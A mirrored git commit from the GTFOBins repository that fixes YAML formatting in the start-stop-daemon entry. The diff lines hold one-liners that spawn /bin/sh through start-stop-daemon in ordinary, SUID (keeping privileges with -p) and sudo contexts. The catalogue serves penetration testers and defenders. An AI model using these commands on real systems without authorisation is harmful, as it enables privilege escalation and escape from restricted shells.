mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 10:48:50 +01:00 
			
		
		
		
	Fix YAML format in start-stop-daemon
This commit is contained in:
		@@ -3,9 +3,7 @@ functions:
 | 
			
		||||
  shell:
 | 
			
		||||
    - code: start-stop-daemon -n $RANDOM -S -x /bin/sh
 | 
			
		||||
  suid:
 | 
			
		||||
    - code: |
 | 
			
		||||
        ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
 | 
			
		||||
    - code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
 | 
			
		||||
  sudo:
 | 
			
		||||
    - code: |
 | 
			
		||||
        sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
 | 
			
		||||
    - code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
 | 
			
		||||
---
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user